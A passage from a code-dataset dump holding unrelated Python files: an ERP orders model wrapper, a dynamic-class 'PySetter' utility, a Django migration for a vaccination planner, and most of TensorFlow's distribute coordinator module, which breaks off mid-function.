self.ctx.sanhigia_pedidos_queryGrid_mastershpedidoscli(model, filters)\n\n def visualizarShPedido(self, model, oParam):\n return self.ctx.sanhigia_pedidos_visualizarShPedido(model, oParam)\n\n def field_shpedidoscliQuerycolorRow(self, model):\n return self.ctx.sanhigia_pedidos_field_shpedidoscliQuerycolorRow(model)\n\n def creaLote(self, codigo, caducidad, referencia):\n return self.ctx.sanhigia_pedidos_creaLote(codigo, caducidad, referencia)\n\n def dameFiltroEstadoPago(self):\n return self.ctx.sanhigia_pedidos_dameFiltroEstadoPago()\n\n","sub_path":"model_flfacturac__pedidoscli_def.py","file_name":"model_flfacturac__pedidoscli_def.py","file_ext":"py","file_size_in_byte":86417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"625495473","text":"#############################\n#############################\n###Load External Modules###\nimport copy,importlib,json,os,sys\n\n#############################\n#############################\n###Set Path to the Settings\nRootSettingsPathSlashString=\"/Users/erwanledoux/Documents/Researchs/\";\nLibPathSlashString=json.load(open(RootSettingsPathSlashString+'RootSettings.json','r'))['PathSlashStrings']['Lib'];\n\n#############################\n#############################\n###Build the Basic Module Installer Method\ndef importModulesFromFolderNames(FolderNames=[]):\n\tLibPathSlashString=json.load(open(RootSettingsPathSlashString+'RootSettings.json','r'))['PathSlashStrings']['Lib']\n\tfor FolderName in FolderNames:\n\t\tFolderPathSlahString=LibPathSlashString+FolderName;\n\t\tModuleName='Py'+FolderName;\n\t\tif (FolderPathSlahString in sys.path)==False:\n\t\t\tsys.path.append(FolderPathSlahString);\n\t\t\timportlib.import_module(ModuleName);\n\n#############################\n#############################\n###PySetterClass Definition\n\n#set the BaseFolderNames\ndef getBaseFolderNames():\n\treturn [];\n\n#Class definition\nclass PySetterClass():\n\n\t####__init__\n\t#\n\tdef __init__(self,**Kwargs):\n\t\t#init Bases\n\t\tinitBases(**{\n\t\t\t\t\t\t'BaseFolderNames':getBaseFolderNames(),\n\t\t\t\t\t\t'Instance':self,\n\t\t\t\t\t\t'InitDictKwargs':Kwargs\n\t\t\t\t\t});\n\t\t\t\t\n\t##general set Method\n\tdef __setitem__(self,Key,Value):\n\t\tself.__dict__[Key]=Value;\n\t\n\t##set the __dict__\n\tdef update(self,Dict):\n\t\t####NEED TO PARSE !!!!#####\n\t\tself.__dict__.update(Dict);\n\n\t##set at a certain PathList\n\tdef setAtPathList(self,**Kwargs):\n\t\t##set possible default Kwargs\n\t\tKwargsOrDefault=getFromKwargsOrDefaultSkeleton(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['Root',self],\n\t\t\t\t\t\t['PathList',[]],\n\t\t\t\t\t\t['AttributeKey',None],\n\t\t\t\t\t\t['AttributeValue',0]\n\t\t\t\t\t ]\n\t\t\t\t\t });\n\t\t\t\t\t \n\t\t##get the SettedObject\n\t\tSettedObject=reduce(getFromPathList,KwargsOrDefault['PathList'],KwargsOrDefault['Root']);\n\t\t\n\t\tif SettedObject!=None:\n\t\t\t\n\t\t\t##if the PathList has a minimal path\n\t\t\tif KwargsOrDefault['AttributeKey']!=None:\n\t\t\t\t##set the SettedObject\n\t\t\t\tif isDictOrInstance(SettedObject) and type(KwargsOrDefault['AttributeKey']) in [str,unicode]:\n\t\t\t\t\tSettedObject[KwargsOrDefault['AttributeKey']]=KwargsOrDefault['AttributeValue'];\n\t\t\t\telif type(SettedObject)==list and type(KwargsOrDefault['AttributeKey'])==int:\n\t\t\t\t\tSettedObject[KwargsOrDefault['AttributeKey']]=KwargsOrDefault['AttributeValue'];\n\t\t\t\n\t\t\t##else update directly the __dict__\n\t\t\telse:\n\t\t\t\tSettedObject.update(KwargsOrDefault['AttributeValue']);\n\n\n#############################\n#############################\n###PySetter Static Methods\n\n###Filter Kwargs with Default possible Values\ndef getFromKwargsOrDefaultItems(**Kwargs):\n\t##init skeleotn\n\tKwargsOrDefaultSkeleton={};\n\t\n\t##accumulate Kwargs\n\tfor Key,DefaultValue in Kwargs['DefaultItems']:\n\t\tKwargsOrDefaultSkeleton[Key]=Kwargs['Kwargs'][Key] if Kwargs['Kwargs'].has_key(Key) else DefaultValue;\n\n\t##return\n\treturn KwargsOrDefaultSkeleton;\n\n\n##add items to the __dict__ from another dict with the rule of adding values in each containers\ndef sumDicts(DictA={},DictB={},**Kwargs):\n\t##set possible default Kwargs\n\tKwargsOrDefault=sys.modules['PySetter'].getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['IsOverWrite',True],\n\t\t\t\t\t ]\n\t\t\t\t\t });\n\t##parse the Values and update or add if conditions are satisfied\n\tfor Key,Value in DictB.items():\n\t\t#special case of Contents Tag ListType...have to parse inside if there are same ID children...\n\t\tif Key=='Contents':\n\t\t\tif hasKeyAttr(DictA,'Contents'):\n\t\t\t\t#sub case where the types are the same\n\t\t\t\tif type(DictA[Key])==type(Value):\n\t\t\t\t\t#list case\n\t\t\t\t\tif type(Value)==list:\n\t\t\t\t\t\tfor ChildIdx in xrange(len(Value)):\n\t\t\t\t\t\t\t#set the Child\n\t\t\t\t\t\t\tChild=Value[ChildIdx];\n\t\t\t\t\t\t\tprint(Child)\n\t\t\t\t\t\t\t#dict or __dict__ subcase\n\t\t\t\t\t\t\tif isDictOrInstance(Child):\n\t\t\t\t\t\t\t\tif hasKeyAttr(Child,'Attributes'):\n\t\t\t\t\t\t\t\t\tif hasKeyAttr(Child['Attributes'],'ID'):\n\t\t\t\t\t\t\t\t\t\tif all(map(lambda Dict:hasKeyAttr(Dict,'Attributes'),DictA[Key])):\n\t\t\t\t\t\t\t\t\t\t\tif all(map(lambda Dict:hasKeyAttr(Dict['Attributes'],'ID'),DictA[Key])):\n\t\t\t\t\t\t\t\t\t\t\t\tif getFromDictOrInstance(getFromDictOrInstance(Child,'Attributes'),'ID') in map(lambda Dict:getFromDictOrInstance(getFromDictOrInstance(Dict,'Attributes'),'ID'),DictA[Key]):\n\t\t\t\t\t\t\t\t\t\t\t\t\t#recursive call of sumDicts\n\t\t\t\t\t\t\t\t\t\t\t\t\tDictA[Key][ChildIdx]=sumDicts(DictA[Key][ChildIdx],Child,**Kwargs);\n\t\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\t\t#add the new Children\n\t\t\t\t\t\t\t\t\t\t\t\t\tDictA[Key]+=[Child];\n\t\t\t\t\t#dict or __dict__ case\n\t\t\t\t\telif isDictOrInstance(Value):\n\t\t\t\t\t\t#recursive call\n\t\t\t\t\t\tDictA[Key]=sumDicts(DictA[Key],Value,**Kwargs);\n\t\t\t\t\telif KwargsOrDefault['IsOverWrite']:\n\t\t\t\t\t\tDictA[Key]=Value;\n\t\t#for the other keys : parse for dict or __dict__ or overwrite\n\t\telse:\n\t\t\tif hasKeyAttr(DictA,Key):\n\t\t\t\t#sub case where the types are the same\n\t\t\t\tif type(DictA[Key])==type(Value):\n\t\t\t\t\tif isDictOrInstance(Value):\n\t\t\t\t\t\t#recursive call of sumDicts\n\t\t\t\t\t\tDictA[Key]=sumDicts(DictA[Key],Value,**Kwargs);\n\t\t\t\t\telif KwargsOrDefault['IsOverWrite']:\n\t\t\t\t\t\tDictA[Key]=Value;\n\t\t\t\telif KwargsOrDefault['IsOverWrite']:\n\t\t\t\t\t#change the type...\n\t\t\t\t\tDictA[Key]=Value;\n\t\t\telse:\n\t\t\t\t#just update either\n\t\t\t\tDictA[Key]=Value;\n\t\t\t\t\n\t#return the DictA\n\treturn DictA;\n\n\n###Instance Getter with a Dict that will be the __dict__\ndef getInstance(**Kwargs):\n\t\t\t\t\n\t#set possible default Kwargs\n\tKwargsOrDefault=getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t[\n\t\t\t\t\t['Dict',{}],\n\t\t\t\t\t['FolderName',\"Default\"],\n\t\t\t\t\t['ModuleName',\"Py\"+Kwargs['FolderName'] if Kwargs.has_key('FolderName') else \"PyDefault\"],\n\t\t\t\t\t['ClassName',\"Py\"+Kwargs['FolderName']+\"Class\" if Kwargs.has_key('FolderName') else \"PyDefaultClass\"],\n\t\t\t\t ]\n\t\t\t\t });\n\tif type(KwargsOrDefault['Dict'])==dict:\n\t\tif KwargsOrDefault['FolderName']!=None:\n\t\t\t#look if maybe there is a Class with this Name in the lib\n\t\t\tDirSlashPath=LibPathSlashString+KwargsOrDefault['FolderName'];\n\t\t\tif os.path.isdir(DirSlashPath):\n\t\t\t\tsys.path.append(LibPathSlashString+KwargsOrDefault['FolderName']);\n\t\t\t\timportlib.import_module(KwargsOrDefault['ModuleName']);\n\t\t\t\tif sys.modules.has_key(KwargsOrDefault['ModuleName']):\n\t\t\t\t\t#add this Base\n\t\t\t\t\tif hasattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName']):\n\t\t\t\t\t\tInstance=getattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName'])();\n\t\t\t\t\t\tsys.modules['PySetter'].addDict(DictA=Instance.__dict__,DictB=KwargsOrDefault['Dict']);\n\t\t\t\t\t\treturn Instance;\n\t\t#if there is not a specify Class for this, just return a default one or a Dict\n\t\t#class PyLocalDefaultClass():pass;\n\t\t#Instance=PyLocalDefaultClass();\n\t\t#Instance.__dict__.update(Kwargs['Dict']);\n\t\t#return Instance;\n\t\treturn KwargsOrDefault['Dict'];\n\n\n###add a class base (and the bases of the base) to a class through an already instancified object of it + call the initDict Method for each new installed base\ndef initBase(**Kwargs):\n\t#default settings\n\tKwargsOrDefault=getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['Instance',[]],\n\t\t\t\t\t\t['FolderName',\"Default\"],\n\t\t\t\t\t\t['ModuleName',\"Py\"+Kwargs['FolderName'] if Kwargs.has_key('FolderName') else \"PyDefault\"],\n\t\t\t\t\t\t['ClassName',\"Py\"+Kwargs['FolderName']+\"Class\" if Kwargs.has_key('FolderName') else \"PyDefaultClass\"],\n\t\t\t\t\t\t['InitDictKwargs',{}]\n\t\t\t\t\t ]\n\t\t});\n\t\t\n\tif hasattr(KwargsOrDefault['Instance'],'__class__'):\n\t\t#look if maybe there is a Class with this Name in the lib\n\t\tDirSlashPath=LibPathSlashString+KwargsOrDefault['FolderName'];\n\t\tif os.path.isdir(DirSlashPath):\n\t\t\tsys.path.append(LibPathSlashString+KwargsOrDefault['FolderName']);\n\t\t\t#check tha a module exists here\n\t\t\timportlib.import_module(KwargsOrDefault['ModuleName']);\n\t\t\tif sys.modules.has_key(KwargsOrDefault['ModuleName']):\n\t\t\t\t#add this Base if it exists a defined Class in the module\n\t\t\t\tif hasattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName']):\n\t\t\t\t\t#don't add if there is already one that is in the bases set of the Instance\n\t\t\t\t\tif (KwargsOrDefault['ClassName'] in map(lambda PythonBase:getattr(PythonBase,'__name__'),KwargsOrDefault['Instance'].__class__.__bases__))==False:\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\t#get the bases dependencies of this new base if there are\n\t\t\t\t\t\tif hasattr(sys.modules[KwargsOrDefault['ModuleName']],'getBaseFolderNames'):\n\t\t\t\t\t\t\tinitBases(**{\n\t\t\t\t\t\t\t\t\t\t\t'Instance':KwargsOrDefault['Instance'],\n\t\t\t\t\t\t\t\t\t\t\t'BaseFolderNames':sys.modules[KwargsOrDefault['ModuleName']].getBaseFolderNames(),\n\t\t\t\t\t\t\t\t\t\t\t'InitDictKwargs':KwargsOrDefault['InitDictKwargs']\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t);\n\t\t\t\t\t\n\t\t\t\t\t\t#add the Base\n\t\t\t\t\t\tKwargsOrDefault['Instance'].__class__.__bases__=tuple(list(KwargsOrDefault['Instance'].__class__.__bases__)+[getattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName'])]);\n\n\t\t\t\t\t\t#do the Init Dict Method\n\t\t\t\t\t\tif hasattr(Kwargs['Instance'],'initPy'+KwargsOrDefault['FolderName']+'Dict'):\n\t\t\t\t\t\t\tgetattr(Kwargs['Instance'],'initPy'+KwargsOrDefault['FolderName']+'Dict')(**KwargsOrDefault['InitDictKwargs']);\n\n\n### addBases from several FolderNames and init their each __dict__\ndef initBases(**Kwargs):\n\t#default settings\n\tKwargsOrDefault=getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['BaseFolderNames',[]],\n\t\t\t\t\t\t['InitDictKwargs',{}]\n\t\t\t\t\t ]\n\t\t});\n\t\n\t#add Bases and set their Dict\n\tfor BaseFolderName in KwargsOrDefault['BaseFolderNames']:\n\t\t\n\t\t#add to the __class__.__bases__\n\t\tinitBase(**{\n\t\t\t\t\t\t'Instance':Kwargs['Instance'],\n\t\t\t\t\t\t'FolderName':BaseFolderName\n\t\t\t\t\t}\n\t\t\t\t);\n\n####get by avoiding an error if the Key doesn't exist\ndef getFromPathList(Parent,Child):\n\tif hasattr(Parent,Child):\n\t\treturn getattr(Parent,Child);\n\telse:\n\t\treturn None;\n\n####say if it has a dict whatever it is a dict or an instance:\ndef isDictOrInstance(DictOrInstance=\"None\"):\n\treturn hasattr(DictOrInstance,'__dict__') or type(DictOrInstance)==dict;\n\n####say if it has this keyAttr whatever it is a Dict or an instance\ndef hasKeyAttr(DictOrInstance,KeyAttr):\n\t#dict case\n\tif type(DictOrInstance)==dict:\n\t\treturn DictOrInstance.has_key(KeyAttr);\n\t#object instance case\n\telse:\n\t\treturn hasattr(DictOrInstance,KeyAttr);\n\n####get the Value from a dict or a __dict__\ndef getFromDictOrInstance(DictOrInstance,Key):\n\tif type(DictOrInstance)==dict:\n\t\treturn DictOrInstance[Key];\n\telif hasattr(DictOrInstance,'__dict__'):\n\t\treturn DictOrInstance.__dict__[Key];\n\n","sub_path":"lib/Setter/PySetter.py","file_name":"PySetter.py","file_ext":"py","file_size_in_byte":10424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333963180","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BaseImmu',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('sign', models.CharField(max_length=50)),\n ('offset', models.DurationField()),\n ('predecessor', models.ForeignKey(to='planer.BaseImmu')),\n ],\n ),\n migrations.CreateModel(\n name='Disease',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('baseImmus', models.ManyToManyField(to='planer.BaseImmu')),\n ],\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('firstName', models.CharField(max_length=50)),\n ('lastName', models.CharField(max_length=50)),\n ('dateOfBirth', models.DateField()),\n ],\n ),\n migrations.CreateModel(\n name='Vaccine',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('coveredDiseases', models.ManyToManyField(to='planer.Disease')),\n ],\n ),\n migrations.CreateModel(\n name='Visit',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('date', models.DateField()),\n ('appliedVaccines', models.ManyToManyField(to='planer.Vaccine')),\n ],\n ),\n ]\n","sub_path":"planer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"385607970","text":"# Copyright 2018 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"A component for running distributed TensorFlow.\"\"\"\n\nimport copy\nimport json\nimport os\nimport threading\nimport time\n\nfrom tensorflow.core.protobuf import config_pb2\nfrom tensorflow.python.client import session\nfrom tensorflow.python.distribute import distribute_coordinator_context\nfrom tensorflow.python.distribute import multi_worker_util\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.training import coordinator\nfrom tensorflow.python.training import monitored_session\nfrom tensorflow.python.training import server_lib\n\n\n_thread_local = threading.local()\n\n\nclass _TaskType(object):\n PS = \"ps\"\n WORKER = \"worker\"\n CHIEF = \"chief\"\n EVALUATOR = \"evaluator\"\n CLIENT = \"client\"\n\n\n# TODO(yuefengz): support another mode where the client colocates with one\n# worker.\nclass CoordinatorMode(object):\n \"\"\"Specify how distribute coordinator runs.\"\"\"\n # The default mode where distribute coordinator will run as a standalone\n # client and connects to remote servers for training. Each remote server can\n # use the distribute coordinator binary with task_type set correctly which\n # will then turn into standard servers.\n STANDALONE_CLIENT = \"standalone_client\"\n\n # The distribute coordinator runs on each worker. It will run a standard\n # server on each worker and optionally run the `worker_fn` that is configured\n # to talk to its standard server.\n INDEPENDENT_WORKER = \"independent_worker\"\n\n\nclass _Barrier(object):\n \"\"\"A reusable barrier class for worker synchronization.\"\"\"\n\n def __init__(self, num_participants):\n \"\"\"Initializes the barrier object.\n\n Args:\n num_participants: an integer which is the expected number of calls of\n `wait` pass to through this barrier.\n \"\"\"\n self._num_participants = num_participants\n self._counter = 0\n self._flag = False\n self._local_sense = threading.local()\n self._lock = threading.Lock()\n self._condition = threading.Condition()\n\n def wait(self):\n \"\"\"Waits until all other callers reach the same wait call.\"\"\"\n self._local_sense.value = not self._flag\n with self._lock:\n self._counter += 1\n if self._counter == self._num_participants:\n self._counter = 0\n self._flag = self._local_sense.value\n with self._condition:\n while self._flag != self._local_sense.value:\n self._condition.wait()\n self._condition.notify_all()\n\n\ndef _get_num_workers(cluster_spec):\n \"\"\"Gets number of workers including chief.\"\"\"\n if not cluster_spec:\n return 0\n return len(cluster_spec.as_dict().get(_TaskType.WORKER, [])) + len(\n cluster_spec.as_dict().get(_TaskType.CHIEF, []))\n\n\nclass _WorkerContext(object):\n \"\"\"The worker context class.\n\n This context object provides configuration information for each task. One\n context manager with a worker context object will be created per\n invocation to the `worker_fn` where `get_current_worker_context` can be called\n to access the worker context object.\n \"\"\"\n\n def __init__(self,\n strategy,\n cluster_spec,\n task_type,\n task_id,\n session_config=None,\n rpc_layer=\"grpc\",\n worker_barrier=None):\n \"\"\"Initialize the worker context object.\n\n Args:\n strategy: a `DistributionStrategy` object.\n cluster_spec: a ClusterSpec object. It can be empty or None in the local\n training case.\n task_type: a string indicating the role of the corresponding task, such as\n \"worker\" or \"ps\". It can be None if it is local training or in-graph\n replicated training.\n task_id: an integer indicating id of the corresponding task. It can be\n None if it is local training or in-graph replicated training.\n session_config: an optional `tf.compat.v1.ConfigProto` object.\n rpc_layer: optional string specifying the RPC protocol for communication\n with worker masters. If None or empty, hosts in the `cluster_spec` will\n be used directly.\n worker_barrier: optional, the barrier object for worker synchronization.\n \"\"\"\n self._strategy = strategy\n self._cluster_spec = cluster_spec\n self._task_type = task_type\n self._task_id = task_id\n self._session_config = session_config\n self._worker_barrier = worker_barrier\n self._rpc_layer = rpc_layer\n self._master_target = self._get_master_target()\n self._num_workers = _get_num_workers(cluster_spec)\n self._is_chief_node = self._is_chief()\n\n def _debug_message(self):\n if self._cluster_spec:\n return \"[cluster_spec: %r, task_type: %r, task_id: %r]\" % (\n self._cluster_spec, self.task_type, self.task_id)\n else:\n return \"[local]\"\n\n def __enter__(self):\n old_context = distribute_coordinator_context.get_current_worker_context()\n if old_context:\n raise ValueError(\n \"You cannot run distribute coordinator in a `worker_fn`.\\t\" +\n self._debug_message())\n # pylint: disable=protected-access\n distribute_coordinator_context._worker_context.current = self\n\n def __exit__(self, unused_exception_type, unused_exception_value,\n unused_traceback):\n # pylint: disable=protected-access\n distribute_coordinator_context._worker_context.current = None\n\n def _get_master_target(self):\n \"\"\"Return the master target for a task.\"\"\"\n # If cluster_spec is None or empty, we use local master.\n if not self._cluster_spec or self._task_type == _TaskType.EVALUATOR:\n return \"\"\n\n # If task_type is None, then it is in-graph replicated training. In this\n # case we use the chief or first worker's master target.\n if not self._task_type:\n if _TaskType.CHIEF in self._cluster_spec.jobs:\n task_type = _TaskType.CHIEF\n task_id = 0\n else:\n assert _TaskType.WORKER in self._cluster_spec.jobs\n task_type = _TaskType.WORKER\n task_id = 0\n else:\n task_type = self._task_type\n task_id = self._task_id\n\n prefix = \"\"\n if self._rpc_layer:\n prefix = self._rpc_layer + \"://\"\n return prefix + self._cluster_spec.job_tasks(task_type)[task_id or 0]\n\n def _is_chief(self):\n \"\"\"Return whether the task is the chief worker.\"\"\"\n if (not self._cluster_spec or\n self._task_type in [_TaskType.CHIEF, _TaskType.EVALUATOR, None]):\n return True\n\n # If not local and chief not in the cluster_spec, use the first worker as\n # chief.\n if (_TaskType.CHIEF not in self._cluster_spec.jobs and\n self._task_type == _TaskType.WORKER and self._task_id == 0):\n return True\n return False\n\n def wait_for_other_workers(self):\n \"\"\"Waits for other workers to reach the same call to this method.\n\n Raises:\n ValueError: if `worker_barrier` is not passed to the __init__ method.\n \"\"\"\n if not self._worker_barrier:\n # TODO(yuefengz): we should throw an error in independent worker mode.\n return\n self._worker_barrier.wait()\n\n def session_creator(self,\n scaffold=None,\n config=None,\n checkpoint_dir=None,\n checkpoint_filename_with_path=None,\n max_wait_secs=7200):\n \"\"\"Returns a session creator.\n\n The returned session creator will be configured with the correct master\n target and session configs. It will also run either init ops or ready ops\n by querying the `strategy` object when `create_session` is called on it.\n\n Args:\n scaffold: A `Scaffold` used for gathering or building supportive ops. If\n not specified a default one is created. It's used to finalize the graph.\n config: `ConfigProto` proto used to configure the session.\n checkpoint_dir: A string. Optional path to a directory where to restore\n variables.\n checkpoint_filename_with_path: Full file name path to the checkpoint file.\n Only one of `checkpoint_dir` or `checkpoint_filename_with_path` can be\n specified.\n max_wait_secs: Maximum time to wait for the session to become available.\n\n Returns:\n a descendant of SessionCreator.\n \"\"\"\n if config:\n session_config = copy.deepcopy(config)\n session_config.MergeFrom(self._session_config)\n else:\n session_config = self._session_config\n\n if not self._strategy or self._strategy.extended.experimental_should_init:\n logging.info(\"Creating chief session creator with config: %r\", config)\n return monitored_session.ChiefSessionCreator(\n scaffold,\n master=self.master_target,\n config=session_config,\n checkpoint_dir=checkpoint_dir,\n checkpoint_filename_with_path=checkpoint_filename_with_path)\n else:\n logging.info(\"Creating worker session creator with config: %r\", config)\n return monitored_session.WorkerSessionCreator(\n scaffold,\n master=self.master_target,\n config=session_config,\n max_wait_secs=max_wait_secs)\n\n @property\n def session_config(self):\n return copy.deepcopy(self._session_config)\n\n @property\n def has_barrier(self):\n \"\"\"Whether the barrier is set or not.\"\"\"\n return self._worker_barrier is not None\n\n @property\n def distributed_mode(self):\n \"\"\"Whether it is distributed training or not.\"\"\"\n return bool(self._cluster_spec) and self._task_type != _TaskType.EVALUATOR\n\n @property\n def cluster_spec(self):\n \"\"\"Returns a copy of the cluster_spec object.\"\"\"\n return copy.deepcopy(self._cluster_spec)\n\n @property\n def task_type(self):\n \"\"\"Returns the role of the corresponding task.\"\"\"\n return self._task_type\n\n @property\n def task_id(self):\n \"\"\"Returns the id or index of the corresponding task.\"\"\"\n return self._task_id\n\n @property\n def master_target(self):\n \"\"\"Returns the session master for the corresponding task to connect to.\"\"\"\n return self._master_target\n\n @property\n def is_chief(self):\n \"\"\"Returns whether the task is a chief node.\"\"\"\n return self._is_chief_node\n\n @property\n def num_workers(self):\n \"\"\"Returns number of workers in the cluster, including chief.\"\"\"\n return self._num_workers\n\n @property\n def experimental_should_init(self):\n \"\"\"Whether to run init ops.\"\"\"\n return self._strategy.extended.experimental_should_init\n\n @property\n def should_checkpoint(self):\n \"\"\"Whether to save checkpoint.\"\"\"\n return self._strategy.extended.should_checkpoint\n\n @property\n def should_save_summary(self):\n \"\"\"Whether to save summaries.\"\"\"\n return self._strategy.extended.should_save_summary\n\n\ndef _run_single_worker(worker_fn,\n strategy,\n cluster_spec,\n task_type,\n task_id,\n session_config,\n rpc_layer=\"\",\n worker_barrier=None,\n coord=None):\n \"\"\"Runs a single worker by calling `worker_fn` under context.\"\"\"\n session_config = copy.deepcopy(session_config)\n strategy = copy.deepcopy(strategy)\n # If there is an EVALUATOR task, we run single-machine eval on that task.\n if task_type == _TaskType.EVALUATOR:\n # It is possible to not have a strategy object for EVALUATOR task.\n if strategy:\n strategy.configure(session_config)\n else:\n assert strategy\n strategy.configure(session_config, cluster_spec, task_type, task_id)\n\n context = _WorkerContext(\n strategy,\n cluster_spec,\n task_type,\n task_id,\n session_config=session_config,\n rpc_layer=rpc_layer,\n worker_barrier=worker_barrier)\n with context:\n if coord:\n with coord.stop_on_exception():\n return worker_fn(strategy)\n else:\n return worker_fn(strategy)\n\n\ndef _split_cluster_for_evaluator(cluster_spec, task_type):\n \"\"\"Split the cluster for evaluator since it needn't talk to other tasks.\"\"\"\n # Splitting the cluster is important to prevent the evaluator from talking to\n # other tasks in the cluster. Since we allow evaluator not to use\n # distribution strategies and as a result ops in the evaluator task may have\n # unspecified devices. Those ops may end up on other tasks if we don't split\n # the cluster.\n # Note: if you bypass distribute coordinator and bring the cluster yourself,\n # you can equivalently set device filters to split clusters. This is already\n # done by distribution strategy's `update_config_proto` method.\n new_cluster_spec = multi_worker_util.normalize_cluster_spec(\n cluster_spec).as_dict()\n if task_type == _TaskType.EVALUATOR:\n assert _TaskType.EVALUATOR in new_cluster_spec\n new_cluster_spec = {\n _TaskType.EVALUATOR: new_cluster_spec[_TaskType.EVALUATOR]\n }\n else:\n new_cluster_spec.pop(_TaskType.EVALUATOR, None)\n return multi_worker_util.normalize_cluster_spec(new_cluster_spec)\n\n\ndef _run_std_server(cluster_spec=None,\n task_type=None,\n task_id=None,\n session_config=None,\n rpc_layer=None,\n environment=None):\n \"\"\"Runs a standard server.\"\"\"\n # Check if the Server is already running. If so, assert that no configuration\n # options have changed, and return the existing Server. This allows us to\n # call `run_distribute_coordinator` multiple times.\n if getattr(_thread_local, \"server\", None) is not None:\n assert _thread_local.cluster_spec == cluster_spec\n assert _thread_local.task_type == task_type\n assert _thread_local.task_id == task_id\n assert _thread_local.session_config_str == repr(session_config)\n assert _thread_local.rpc_layer == rpc_layer\n assert _thread_local.environment == environment\n return _thread_local.server\n else:\n # This method is not thread-safe.\n _thread_local.server_started = True\n _thread_local.cluster_spec = cluster_spec\n _thread_local.task_type = task_type\n _thread_local.task_id = task_id\n _thread_local.session_config_str = repr(session_config)\n _thread_local.rpc_layer = rpc_layer\n _thread_local.environment = environment\n\n assert cluster_spec\n target = cluster_spec.task_address(task_type, task_id)\n if rpc_layer:\n target = rpc_layer + \"://\" + target\n\n class _FakeServer(object):\n \"\"\"A fake server that runs a master session.\"\"\"\n\n def start(self):\n # A tensorflow server starts when a remote session is created.\n logging.info(\n \"Creating a remote session to start a TensorFlow server, \"\n \"target = %r, session_config=%r\", target, session_config)\n session.Session(target=target, config=session_config)\n\n def join(self):\n while True:\n time.sleep(5)\n\n if environment == \"google\":\n server = _FakeServer()\n else:\n if session_config:\n logging.info(\n \"Starting standard TensorFlow server, target = %r, session_config= \"\n \"%r\", target, session_config)\n else:\n logging.info(\"Starting standard TensorFlow server, target = %r\", target)\n cluster_spec = _split_cluster_for_evaluator(cluster_spec, task_type)\n server = server_lib.Server(\n cluster_spec,\n job_name=task_type,\n task_index=task_id,\n config=session_config,\n protocol=rpc_layer)\n\n server.start()\n _thread_local.server = server\n return server\n\n\ndef _run_between_graph_client(worker_fn, strategy, eval_fn, eval_strategy,\n cluster_spec, session_config, rpc_layer):\n \"\"\"Runs a standalone client for between-graph replication.\"\"\"\n coord = coordinator.Coordinator()\n eval_thread = None\n if _TaskType.EVALUATOR in cluster_spec.jobs:\n eval_thread = threading.Thread(\n target=_run_single_worker,\n args=(eval_fn, eval_strategy, cluster_spec, _TaskType.EVALUATOR, 0,\n session_config),\n kwargs={\n \"rpc_layer\": rpc_layer,\n \"coord\": coord,\n })\n eval_thread.start()\n\n threads = []\n worker_barrier = _Barrier(_get_num_workers(cluster_spec))\n for task_type in [_TaskType.CHIEF, _TaskType.WORKER]:\n for task_id in range(len(cluster_spec.as_dict().get(task_type, []))):\n t = threading.Thread(\n target=_run_single_worker,\n args=(worker_fn, strategy, cluster_spec, task_type, task_id,\n session_config),\n kwargs={\n \"rpc_layer\": rpc_layer,\n \"worker_barrier\": worker_barrier,\n \"coord\": coord,\n })\n t.start()\n threads.append(t)\n\n if eval_thread:\n # TODO(yuefengz): is it necessary to join eval thread?\n threads_to_join = threads + [eval_thread]\n else:\n threads_to_join = threads\n coord.join(threads_to_join)\n\n # TODO(yuefengz): we probably want to return results from all workers?\n return None\n\n\ndef _run_in_graph_client(worker_fn, strategy, eval_fn, eval_strategy,\n cluster_spec, session_config, rpc_layer):\n \"\"\"Runs a standalone client for in-graph replication.\"\"\"\n coord = coordinator.Coordinator()\n eval_thread = None\n if _TaskType.EVALUATOR in 